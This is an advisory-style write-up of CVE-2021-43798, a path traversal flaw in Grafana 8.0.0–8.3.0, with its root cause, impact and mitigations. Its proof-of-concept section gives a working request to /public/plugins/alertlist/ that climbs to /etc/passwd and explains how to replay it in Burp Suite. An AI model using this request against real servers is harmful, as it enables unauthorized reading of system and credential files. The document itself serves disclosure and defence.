Vulnerable Version
8.0.0 – 8.3.0
Fixed Version
8.3.1, 8.2.7, 8.1.8, 8.0.7
Base Score
7.5 High
Vendor Description:-
Grafana is an open-source analytics and monitoring platform designed to visualize, query, and analyze data from multiple sources in real-time. It provides an intuitive and highly customizable dashboard interface, enabling users to track key performance metrics, detect trends, and respond to anomalies across diverse systems and applications.
Vulnerability Discription:-
The root cause of CVE-2021-43798 lies in Grafana’s plugin assets handling mechanism, specifically in the /public/plugins/ API endpoint. This API does not properly validate user-supplied paths, allowing attackers to:
Escape the intended plugin directory using directory traversal sequences such as ../../.
Access sensitive files stored on the underlying operating system.
The API is intended to allow access to resources related to plugins stored under:
<grafana_installation_path>/public/plugins/
<grafana_host_url>/public/plugins/annolist/
<grafana_host_url>/public/plugins/barchart/
<grafana_host_url>/public/plugins/bargauge/
<grafana_host_url>/public/plugins/candlestick/
<grafana_host_url>/public/plugins/cloudwatch/
<grafana_host_url>/public/plugins/dashlist/
<grafana_host_url>/public/plugins/elasticsearch/
…….. for more click me.
However, the lack of input sanitization permits the attacker to traverse the filesystem. For example:
Requesting the file path ../../../../../../../../etc/passwd retrieves the contents of /etc/passwd.
POC
The directory being accessed is at <grafana>/public/app/plugins/panel/<pluginId>. On a standard Grafana installation, the Grafana data directory is /usr/share/grafana. So by going back 8 directories, you can reach the filesystem root directory.
HTTP Request
GET – http://localhost:3000/public/plugins/alertlist/../../../../../../../../etc/passwd.
- Now Verify arbitrary file reading Vulnerability using burpsuite.
First intercept the request and then send to it burp repeater.
After sending the request in the repeater, change the Request URI.
/login à /public/plugins/alertlist/../../../../../../../../etc/passwd
Impact:
Data Exposure: An attacker could gain access to sensitive data such as authentication secrets, database credentials, and other confidential system files, potentially leading to further exploitation. Expanded Attack Surface: Information obtained from the arbitrary file read may enable attackers to launch additional attacks, such as privilege escalation or lateral movement within the network.
Compliance and Regulatory Risks: Organizations may face compliance issues if exposed data contains personally identifiable information (PII) or violates data protection regulations such as GDPR or HIPAA.
Operational Disruption: The unauthorized disclosure of system information can lead to unauthorized changes, service disruption, or compromise of dependent applications.
Mitigations:
All installations between v8.0.0-beta1 and v8.3.0 should be upgraded as soon as possible.
If you can not upgrade, running a reverse proxy in front of Grafana that normalizes the PATH of the request will mitigate the vulnerability. For example the normalize_path setting in envoy.
POC Video:-